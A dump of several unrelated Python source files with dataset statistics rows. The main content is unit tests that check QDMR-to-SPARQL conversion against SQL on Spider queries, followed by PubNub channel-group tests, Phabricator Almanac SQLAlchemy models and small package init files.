}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# #1: SELECT['visitor']
# #2: FILTER['#1', 'that visited a museum opened before 2009']
# #3: FILTER['#2', 'that visited a museum opened after 2011']
# #4: PROJECT['name of #REF', '#3']
qdmr = QdmrInstance(["select", "filter", "filter", "project"],
[["visitor"],
['#1', 'that visited a museum opened before 2009'],
['#2', 'that visited a museum opened after 2011'],
['name of #REF', '#3']
])
grounding = {}
grounding[GroundingIndex(0,0,"visitor")] = GroundingKey.make_table_grounding("visitor")
grounding[GroundingIndex(1,1,"that visited a museum opened before 2009")] = GroundingKey.make_comparative_grounding("<", "2009", GroundingKey.make_column_grounding("museum", "Open_Year"))
grounding[GroundingIndex(2,1,"that visited a museum opened after 2011")] = GroundingKey.make_comparative_grounding(">", "2011", GroundingKey.make_column_grounding("museum", "Open_Year"))
grounding[GroundingIndex(3,0,"name of #REF")] = GroundingKey.make_column_grounding("visitor", "Name")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderTrain1353(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "train"
i_query = 1353
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# Question: What is the sum of budgets of the Marketing and Finance departments?
# sql_query:
# SELECT sum(budget) FROM department WHERE dept_name = 'Marketing' OR dept_name = 'Finance'
correct_sparql_query = textwrap.dedent("""\
SELECT (?budget_1 + ?budget_2 AS ?sum)
WHERE
{
?dep_1 arc:department:budget ?budget_1.
?dep_1 arc:department:dept_name ?dept_name_1.
FILTER(?dept_name_1 = key:department:dept_name:Marketing).
?dep_2 arc:department:budget ?budget_2.
?dep_2 arc:department:dept_name ?dept_name_2.
FILTER(?dept_name_2 = key:department:dept_name:Finance).
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['budgets']
# FILTER['#1', 'of the Marketing department']
# FILTER['#1', 'of the Finance department']
# ARITHMETIC['sum', '#2', '#3']
grounding = {}
grounding[GroundingIndex(0,0,"budgets")] = GroundingKey.make_column_grounding("department", "budget")
# grounding looks like key:department:dept_name:Marketing because that value is a key in the RDF graph
grounding[GroundingIndex(1,1,"of the Marketing department")] = GroundingKey.make_value_grounding("department", "dept_name", "Marketing")
grounding[GroundingIndex(2,1,"of the Finance department")] = GroundingKey.make_value_grounding("department", "dept_name", "Finance")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderTrain4320(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "train"
i_query = 4320
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# Question: What are the distinct grant amount for the grants where the documents were sent before '1986-08-26 20:49:27' and grant were ended after '1989-03-16 18:27:16'?
# sql_query:
# SELECT T1.grant_amount FROM Grants AS T1 JOIN Documents AS T2 ON T1.grant_id = T2.grant_id WHERE T2.sent_date < '1986-08-26 20:49:27'
# INTERSECT
# SELECT grant_amount FROM grants WHERE grant_end_date > '1989-03-16 18:27:16'
# CAUTION! this query interprets dates as strings and works just by luck! need to parse dates properly
correct_sparql_query = textwrap.dedent("""\
SELECT DISTINCT ?grant_amount
WHERE
{
{
SELECT ?Grants
WHERE
{
{
SELECT ?Grants
WHERE
{
?grant_id arc:Documents:grant_id:Grants:grant_id ?Grants.
?Documents arc:Documents:grant_id ?grant_id.
?Documents arc:Documents:sent_date ?sent_date.
FILTER(?sent_date < "1986-08-26 20:49:27").
}
GROUP BY ?Grants
}
?Grants arc:Grants:grant_end_date ?grant_end_date.
FILTER(?grant_end_date > "1989-03-16 18:27:16").
}
GROUP BY ?Grants
}
?Grants arc:Grants:grant_amount ?grant_amount.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# #1: SELECT['grants']
# #2: PROJECT['documents of #REF', '#1']
# #3: PROJECT['when #REF were sent', '#2']
# #4: PROJECT['when #REF ended', '#1']
# #5: COMPARATIVE['#1', '#3', 'is before 1986-08-26 20:49:27']
# #6: COMPARATIVE['#1', '#4', 'is after 1989-03-16 18:27:16']
# #7: INTERSECTION['#1', '#5', '#6']
# #8: PROJECT['distinct grant amounts of #REF', '#7']
grounding = {}
grounding[GroundingIndex(0,0,"grants")] = GroundingKey.make_table_grounding("Grants")
grounding[GroundingIndex(1,0,"documents of #REF")] = GroundingKey.make_table_grounding("Documents")
grounding[GroundingIndex(2,0,"when #REF were sent")] = GroundingKey.make_column_grounding("Documents", "sent_date")
grounding[GroundingIndex(3,0,"when #REF ended")] = GroundingKey.make_column_grounding("Grants", "grant_end_date")
grounding[GroundingIndex(4,2,"is before 1986-08-26 20:49:27")] = GroundingKey.make_comparative_grounding("<", "1986-08-26 20:49:27", GroundingKey.make_column_grounding("Documents", "sent_date"))
grounding[GroundingIndex(5,2,"is after 1989-03-16 18:27:16")] = GroundingKey.make_comparative_grounding(">", "1989-03-16 18:27:16", GroundingKey.make_column_grounding("Grants", "grant_end_date"))
grounding[GroundingIndex(7,0,"distinct grant amounts of #REF")] = GroundingKey.make_column_grounding("Grants", "grant_amount")
grounding["distinct"] = ["#8"]
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
# class TestSpiderTrain1384(unittest.TestCase):
# @timeout(ONE_TEST_TIMEOUT)
# def test_spider_dev(self):
# """Test an entry from spider dataset
# """
# split_name = "train"
# i_query = 1384
# db_id = get_db_id(split_name, i_query)
# rdf_graph, schema = get_graph_and_schema(split_name, db_id)
# sql_query = get_sql_query(split_name, i_query)
# # Question: Find the name of the students and their department names sorted by their total credits in ascending order.
# # sql_query:
# # SELECT name , dept_name FROM student ORDER BY tot_cred
# # CAUTION: this test works fine but is super slow (large database) so I'm commenting it out by default
# correct_sparql_query = textwrap.dedent("""\
# SELECT ?name ?dept_name ?tot_cred
# WHERE
# {
# ?student arc:student:name ?name.
# ?student arc:student:dept_name ?dept_name.
# ?student arc:student:tot_cred ?tot_cred.
# }
# ORDER BY ASC(?tot_cred)""")
# qdmr = get_qdmr_from_break(split_name, i_query)
# qdmr.args[3] = ["#1", "#3", "in ascending order"]
# # break_program:
# # SELECT['students']
# # PROJECT['credits of #REF', '#1']
# # GROUP['sum', '#2', '#1']
# # SORT['#1', '#3', 'in ascending order']
# # PROJECT['names of #REF', '#4']
# # PROJECT['departments of #REF', '#4']
# # PROJECT['names of #REF', '#6']
# # UNION['#5', '#7']
# grounding = {}
# grounding[GroundingIndex(0,0,"students")] = GroundingKey.make_table_grounding("student")
# grounding[GroundingIndex(1,0,"credits of #REF")] = GroundingKey.make_column_grounding("student", "tot_cred")
# grounding[GroundingIndex(3,2,"in ascending order")] = GroundingKey.make_sortdir_grounding(ascending=True)
# grounding[GroundingIndex(4,0,"names of #REF")] = GroundingKey.make_column_grounding("student", "name")
# grounding[GroundingIndex(5,0,"departments of #REF")] = GroundingKey.make_column_grounding("student", "dept_name")
# grounding[GroundingIndex(6,0,"names of #REF")] = GroundingKey.make_column_grounding("student", "dept_name")
# sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
# result_correct = QueryResult.execute_query_sql(sql_query, schema)
# result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
# equal, message = result.is_equal_to(result_correct,
# require_column_order=True,
# require_row_order=True,
# return_message=True)
# self.assertTrue(equal, message)
if __name__ == '__main__':
datasets_break = {}
datasets_spider = {}
script_path = os.path.dirname(os.path.abspath(__file__))
root_path = os.path.abspath(os.path.join(script_path, ".."))
spider_path = os.path.join(root_path, "data", "spider")
db_path = os.path.join(spider_path, "database")
qdmr_path = os.path.join(root_path, "data", "break", "logical-forms")
for split_name in ['dev', 'train']:
datasets_break[split_name] = DatasetBreak(qdmr_path, split_name)
datasets_spider[split_name] = DatasetSpider(spider_path, split_name)
def get_db_id(subset, i_query):
query_name, sql_data = datasets_spider[subset][i_query]
db_id = sql_data["db_id"]
return db_id
@lru_cache()
def get_graph_and_schema(subset, db_id):
dataset_spider = datasets_spider[subset]
table_data = dataset_spider.table_data
schema = dataset_spider.schemas[db_id]
assert db_id in table_data, f"Could not find database {db_id} in any subset"
table_data = table_data[db_id]
schema.load_table_data(db_path)
rdf_graph = RdfGraph(schema)
return rdf_graph, schema
def get_qdmr_from_break(subset, i_query):
qdmr = datasets_break[subset].get_qdmr_by_subset_indx(i_query, "SPIDER")
# qdmr_name = dataset_break.get_name_by_subset_indx(args.spider_idx)
return qdmr
def get_sql_query(subset, i_query):
query_name, sql_data = datasets_spider[subset][i_query]
sql_query = sql_data["query"]
return sql_query
unittest.main()
| 47.512371 | 203 | 0.593109 | 25,232 | 230,435 | 5.122186 | 0.02699 | 0.040938 | 0.044087 | 0.062123 | 0.871637 | 0.848023 | 0.823867 | 0.801011 | 0.772545 | 0.749302 | 0 | 0.018537 | 0.303079 | 230,435 | 4,849 | 204 | 47.52217 | 0.786239 | 0.15456 | 0 | 0.670592 | 0 | 0.00062 | 0.28782 | 0.028825 | 0 | 0 | 0 | 0 | 0.02789 | 1 | 0.02789 | false | 0 | 0.003719 | 0 | 0.049892 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
135bf88d4da45acaf82ad571e349573147329850 | 219 | py | Python | paprika/consumers/ConsumeException.py | thunder-/paprika | af262407ec9c195dbb5a7c205510e6ad2fb65f36 | [
"MIT"
] | null | null | null | paprika/consumers/ConsumeException.py | thunder-/paprika | af262407ec9c195dbb5a7c205510e6ad2fb65f36 | [
"MIT"
] | null | null | null | paprika/consumers/ConsumeException.py | thunder-/paprika | af262407ec9c195dbb5a7c205510e6ad2fb65f36 | [
"MIT"
] | null | null | null | class ConsumeException(Exception):
def __init__(self, message):
self.__message = message
def __str__(self):
return repr(self.__message)
def get_message(self):
return self.__message
| 21.9 | 35 | 0.666667 | 24 | 219 | 5.458333 | 0.458333 | 0.335878 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.246575 | 219 | 9 | 36 | 24.333333 | 0.793939 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0 | 0 | 0.285714 | 0.857143 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
13ab8273ae4504f7926b2efd052269daf6cdeb34 | 77 | py | Python | tf2onnx/version.py | Sarang2Twins/tensorflow-onnx | ed6142baa3c2db878e96292e4acb1929eff59dbd | [
"Apache-2.0"
] | null | null | null | tf2onnx/version.py | Sarang2Twins/tensorflow-onnx | ed6142baa3c2db878e96292e4acb1929eff59dbd | [
"Apache-2.0"
] | null | null | null | tf2onnx/version.py | Sarang2Twins/tensorflow-onnx | ed6142baa3c2db878e96292e4acb1929eff59dbd | [
"Apache-2.0"
] | null | null | null |
version = '1.10.0'
git_version = '496b65d7d33c621b3e2e53844af0dd64240fcf69'
| 19.25 | 56 | 0.805195 | 7 | 77 | 8.714286 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.428571 | 0.090909 | 77 | 3 | 57 | 25.666667 | 0.442857 | 0 | 0 | 0 | 0 | 0 | 0.605263 | 0.526316 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
13b2d8cb5f58ffbb30a4102f8bd4773e69562f13 | 5,433 | py | Python | tests/integrational/native_sync/test_channel_groups.py | Versature/pubnub-python | a558d212a44ada6fbf2793a32e93685c959b8b22 | [
"MIT"
] | null | null | null | tests/integrational/native_sync/test_channel_groups.py | Versature/pubnub-python | a558d212a44ada6fbf2793a32e93685c959b8b22 | [
"MIT"
] | null | null | null | tests/integrational/native_sync/test_channel_groups.py | Versature/pubnub-python | a558d212a44ada6fbf2793a32e93685c959b8b22 | [
"MIT"
] | null | null | null | import logging
import time
import unittest
import pubnub
from pubnub.models.consumer.channel_group import PNChannelGroupsAddChannelResult, PNChannelGroupsListResult, \
PNChannelGroupsRemoveChannelResult, PNChannelGroupsRemoveGroupResult
from pubnub.pubnub import PubNub
from tests.helper import pnconf_copy
from tests.integrational.vcr_helper import use_cassette_and_stub_time_sleep_native
pubnub.set_stream_logger('pubnub', logging.DEBUG)
class TestPubNubChannelGroups(unittest.TestCase):
@use_cassette_and_stub_time_sleep_native(
'tests/integrational/fixtures/native_sync/channel_groups/single_channel.yaml',
filter_query_parameters=['uuid', 'pnsdk'])
def test_single_channel(self):
ch = "channel-groups-native-ch"
gr = "channel-groups-native-cg"
pubnub = PubNub(pnconf_copy())
# cleanup
envelope = pubnub.remove_channel_group() \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsRemoveGroupResult)
# add
envelope = pubnub.add_channel_to_channel_group() \
.channels(ch) \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsAddChannelResult)
time.sleep(2)
# list
envelope = pubnub.list_channels_in_channel_group() \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsListResult)
assert len(envelope.result.channels) == 1
assert envelope.result.channels[0] == ch
# remove
envelope = pubnub.remove_channel_from_channel_group() \
.channels(ch) \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsRemoveChannelResult)
time.sleep(2)
# list
envelope = pubnub.list_channels_in_channel_group() \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsListResult)
assert len(envelope.result.channels) == 0
@use_cassette_and_stub_time_sleep_native(
'tests/integrational/fixtures/native_sync/channel_groups/add_remove_multiple_channels.yaml',
filter_query_parameters=['uuid', 'pnsdk'])
def test_add_remove_multiple_channels(self):
ch1 = "channel-groups-unit-ch1"
ch2 = "channel-groups-unit-ch2"
gr = "channel-groups-unit-cg"
pubnub = PubNub(pnconf_copy())
# cleanup
envelope = pubnub.remove_channel_group() \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsRemoveGroupResult)
# add
envelope = pubnub.add_channel_to_channel_group() \
.channels([ch1, ch2]) \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsAddChannelResult)
time.sleep(1)
# list
envelope = pubnub.list_channels_in_channel_group() \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsListResult)
assert len(envelope.result.channels) == 2
assert ch1 in envelope.result.channels
assert ch2 in envelope.result.channels
# remove
envelope = pubnub.remove_channel_from_channel_group() \
.channels([ch1, ch2]) \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsRemoveChannelResult)
time.sleep(1)
# list
envelope = pubnub.list_channels_in_channel_group() \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsListResult)
assert len(envelope.result.channels) == 0
@use_cassette_and_stub_time_sleep_native(
'tests/integrational/fixtures/native_sync/channel_groups/add_channel_remove_group.yaml',
filter_query_parameters=['uuid', 'pnsdk'])
def test_add_channel_remove_group(self):
ch = "channel-groups-unit-ch"
gr = "channel-groups-unit-cg"
pubnub = PubNub(pnconf_copy())
# cleanup
envelope = pubnub.remove_channel_group() \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsRemoveGroupResult)
# add
envelope = pubnub.add_channel_to_channel_group() \
.channels(ch) \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsAddChannelResult)
time.sleep(1)
# list
envelope = pubnub.list_channels_in_channel_group() \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsListResult)
assert len(envelope.result.channels) == 1
assert envelope.result.channels[0] == ch
# remove
envelope = pubnub.remove_channel_group() \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsRemoveGroupResult)
time.sleep(1)
# list
envelope = pubnub.list_channels_in_channel_group() \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsListResult)
assert len(envelope.result.channels) == 0
| 31.587209 | 110 | 0.646052 | 527 | 5,433 | 6.417457 | 0.129032 | 0.109994 | 0.062093 | 0.079834 | 0.79657 | 0.79657 | 0.79657 | 0.786813 | 0.77469 | 0.736546 | 0 | 0.005987 | 0.262102 | 5,433 | 171 | 111 | 31.77193 | 0.837615 | 0.015829 | 0 | 0.780702 | 0 | 0 | 0.082911 | 0.076721 | 0 | 0 | 0 | 0 | 0.219298 | 1 | 0.026316 | false | 0 | 0.070175 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9218a0a06cfcd5ddd4cadbb0b2246db7a1a5ac9 | 36 | py | Python | src/factory/__init__.py | menshiva/ascii-art | 3493d8eefe6625f3960e712351908b410441389a | [
"Apache-2.0"
] | null | null | null | src/factory/__init__.py | menshiva/ascii-art | 3493d8eefe6625f3960e712351908b410441389a | [
"Apache-2.0"
] | null | null | null | src/factory/__init__.py | menshiva/ascii-art | 3493d8eefe6625f3960e712351908b410441389a | [
"Apache-2.0"
] | null | null | null | from .art_factory import ArtFactory
| 18 | 35 | 0.861111 | 5 | 36 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 36 | 1 | 36 | 36 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b92a7fc3609935cfad630e071e0b2016c718733c | 39 | py | Python | comments/tests/conftest.py | HotStew/respa | 04f39efb15b4f4206a122e665f8377c7198e1f25 | [
"MIT"
] | 49 | 2015-10-21T06:25:31.000Z | 2022-03-20T07:24:20.000Z | comments/tests/conftest.py | HotStew/respa | 04f39efb15b4f4206a122e665f8377c7198e1f25 | [
"MIT"
] | 728 | 2015-06-24T13:26:54.000Z | 2022-03-24T12:18:41.000Z | comments/tests/conftest.py | digipointtku/respa | a529e0df4d3f072df7801adb5bf97a5f4abd1243 | [
"MIT"
] | 46 | 2015-06-26T10:52:57.000Z | 2021-12-17T09:38:25.000Z | from resources.tests.conftest import *
| 19.5 | 38 | 0.820513 | 5 | 39 | 6.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 39 | 1 | 39 | 39 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b96f41f17489e840f487ad83fbf5e8e87ceb5a89 | 7,682 | py | Python | pyphabricatordb/almanac.py | veblush/PyPhabricatorDb | 154efbe225d593e9f073d73fd428171f1dd0536b | [
"MIT"
] | null | null | null | pyphabricatordb/almanac.py | veblush/PyPhabricatorDb | 154efbe225d593e9f073d73fd428171f1dd0536b | [
"MIT"
] | null | null | null | pyphabricatordb/almanac.py | veblush/PyPhabricatorDb | 154efbe225d593e9f073d73fd428171f1dd0536b | [
"MIT"
] | null | null | null | # coding: utf-8
from sqlalchemy import BINARY, Column, Index, Integer, String, VARBINARY
from sqlalchemy import String, Unicode, ForeignKey
from sqlalchemy.orm import relationship, backref
from dbdatetime import dbdatetime
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class AlmanacBinding(Base):
__tablename__ = 'almanac_binding'
__table_args__ = (
Index('key_service', 'servicePHID', 'interfacePHID', unique=True),
)
id = Column(Integer, primary_key=True)
phid = Column(String, nullable=False, unique=True)
servicePHID = Column(String, nullable=False)
devicePHID = Column(String, nullable=False, index=True)
interfacePHID = Column(String, nullable=False, index=True)
mailKey = Column(BINARY(20), nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
dateModified = Column(dbdatetime, nullable=False)
class AlmanacBindingTransaction(Base):
__tablename__ = 'almanac_bindingtransaction'
id = Column(Integer, primary_key=True)
phid = Column(String, nullable=False, unique=True)
authorPHID = Column(String, nullable=False)
objectPHID = Column(String, nullable=False, index=True)
viewPolicy = Column(String, nullable=False)
editPolicy = Column(String, nullable=False)
commentPHID = Column(String)
commentVersion = Column(Integer, nullable=False)
transactionType = Column(Unicode(32), nullable=False)
oldValue = Column(Unicode, nullable=False)
newValue = Column(Unicode, nullable=False)
contentSource = Column(Unicode, nullable=False)
usermetadata = Column('metadata', Unicode, nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
dateModified = Column(dbdatetime, nullable=False)
class AlmanacDevice(Base):
__tablename__ = 'almanac_device'
id = Column(Integer, primary_key=True)
phid = Column(String, nullable=False, unique=True)
name = Column(Unicode(128), nullable=False, index=True)
dateCreated = Column(dbdatetime, nullable=False)
dateModified = Column(dbdatetime, nullable=False)
nameIndex = Column(BINARY(12), nullable=False, unique=True)
mailKey = Column(BINARY(20), nullable=False)
viewPolicy = Column(String, nullable=False)
editPolicy = Column(String, nullable=False)
isLocked = Column(Integer, nullable=False)
class AlmanacDeviceTransaction(Base):
__tablename__ = 'almanac_devicetransaction'
id = Column(Integer, primary_key=True)
phid = Column(String, nullable=False, unique=True)
authorPHID = Column(String, nullable=False)
objectPHID = Column(String, nullable=False, index=True)
viewPolicy = Column(String, nullable=False)
editPolicy = Column(String, nullable=False)
commentPHID = Column(String)
commentVersion = Column(Integer, nullable=False)
transactionType = Column(Unicode(32), nullable=False)
oldValue = Column(Unicode, nullable=False)
newValue = Column(Unicode, nullable=False)
contentSource = Column(Unicode, nullable=False)
usermetadata = Column('metadata', Unicode, nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
dateModified = Column(dbdatetime, nullable=False)
class AlmanacInterface(Base):
__tablename__ = 'almanac_interface'
__table_args__ = (
Index('key_location', 'networkPHID', 'address', 'port'),
)
id = Column(Integer, primary_key=True)
phid = Column(String, nullable=False, unique=True)
devicePHID = Column(String, nullable=False, index=True)
networkPHID = Column(String, nullable=False)
address = Column(Unicode(64), nullable=False)
port = Column(Integer, nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
dateModified = Column(dbdatetime, nullable=False)
class AlmanacNetwork(Base):
__tablename__ = 'almanac_network'
id = Column(Integer, primary_key=True)
phid = Column(String, nullable=False, unique=True)
name = Column(Unicode(128), nullable=False)
mailKey = Column(BINARY(20), nullable=False)
viewPolicy = Column(String, nullable=False)
editPolicy = Column(String, nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
dateModified = Column(dbdatetime, nullable=False)
class AlmanacNetworkTransaction(Base):
__tablename__ = 'almanac_networktransaction'
id = Column(Integer, primary_key=True)
phid = Column(String, nullable=False, unique=True)
authorPHID = Column(String, nullable=False)
objectPHID = Column(String, nullable=False, index=True)
viewPolicy = Column(String, nullable=False)
editPolicy = Column(String, nullable=False)
commentPHID = Column(String)
commentVersion = Column(Integer, nullable=False)
transactionType = Column(Unicode(32), nullable=False)
oldValue = Column(Unicode, nullable=False)
newValue = Column(Unicode, nullable=False)
contentSource = Column(Unicode, nullable=False)
usermetadata = Column('metadata', Unicode, nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
dateModified = Column(dbdatetime, nullable=False)
class AlmanacProperty(Base):
__tablename__ = 'almanac_property'
__table_args__ = (
Index('objectPHID', 'objectPHID', 'fieldIndex', unique=True),
)
id = Column(Integer, primary_key=True)
objectPHID = Column(String, nullable=False)
fieldIndex = Column(BINARY(12), nullable=False)
fieldName = Column(Unicode(128), nullable=False)
fieldValue = Column(Unicode, nullable=False)
class AlmanacService(Base):
__tablename__ = 'almanac_service'
id = Column(Integer, primary_key=True)
phid = Column(String, nullable=False, unique=True)
name = Column(Unicode(128), nullable=False, index=True)
nameIndex = Column(BINARY(12), nullable=False, unique=True)
mailKey = Column(BINARY(20), nullable=False)
viewPolicy = Column(String, nullable=False)
editPolicy = Column(String, nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
dateModified = Column(dbdatetime, nullable=False)
serviceClass = Column(Unicode(64), nullable=False, index=True)
isLocked = Column(Integer, nullable=False)
class AlmanacServiceTransaction(Base):
__tablename__ = 'almanac_servicetransaction'
id = Column(Integer, primary_key=True)
phid = Column(String, nullable=False, unique=True)
authorPHID = Column(String, nullable=False)
objectPHID = Column(String, nullable=False, index=True)
viewPolicy = Column(String, nullable=False)
editPolicy = Column(String, nullable=False)
commentPHID = Column(String)
commentVersion = Column(Integer, nullable=False)
transactionType = Column(Unicode(32), nullable=False)
oldValue = Column(Unicode, nullable=False)
newValue = Column(Unicode, nullable=False)
contentSource = Column(Unicode, nullable=False)
usermetadata = Column('metadata', Unicode, nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
dateModified = Column(dbdatetime, nullable=False)
class Edge(Base):
__tablename__ = 'edge'
__table_args__ = (
Index('key_dst', 'dst', 'type', 'src', unique=True),
Index('src', 'src', 'type', 'dateCreated', 'seq')
)
src = Column(String, primary_key=True, nullable=False)
type = Column(Integer, primary_key=True, nullable=False)
dst = Column(String, primary_key=True, nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
seq = Column(Integer, nullable=False)
dataID = Column(Integer)
class EdgeData(Base):
__tablename__ = 'edgedata'
id = Column(Integer, primary_key=True)
data = Column(Unicode, nullable=False) | 38.218905 | 74 | 0.725592 | 815 | 7,682 | 6.720245 | 0.117791 | 0.242103 | 0.13511 | 0.168888 | 0.759357 | 0.725215 | 0.700201 | 0.658024 | 0.649078 | 0.649078 | 0 | 0.006072 | 0.16389 | 7,682 | 201 | 75 | 38.218905 | 0.846645 | 0.001692 | 0 | 0.648148 | 0 | 0 | 0.049426 | 0.013432 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.030864 | 0 | 0.932099 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
b96f426a6ae42e4c0b4655f6fc92d2934b6a94e1 | 269 | py | Python | fypy/model/levy/__init__.py | jkirkby3/fypy | 28654800c91683685aee559aac13a17e3f4583b8 | [
"MIT"
] | 16 | 2021-04-24T18:51:00.000Z | 2022-03-31T16:17:21.000Z | fypy/model/levy/__init__.py | jkirkby3/fypy | 28654800c91683685aee559aac13a17e3f4583b8 | [
"MIT"
] | null | null | null | fypy/model/levy/__init__.py | jkirkby3/fypy | 28654800c91683685aee559aac13a17e3f4583b8 | [
"MIT"
] | 6 | 2021-04-28T12:19:25.000Z | 2022-03-31T16:19:36.000Z | from fypy.model.levy.VarianceGamma import VarianceGamma
from fypy.model.levy.BlackScholes import BlackScholes
from fypy.model.levy.CGMY import CMGY
from fypy.model.levy.KouJD import KouJD
from fypy.model.levy.MertonJD import MertonJD
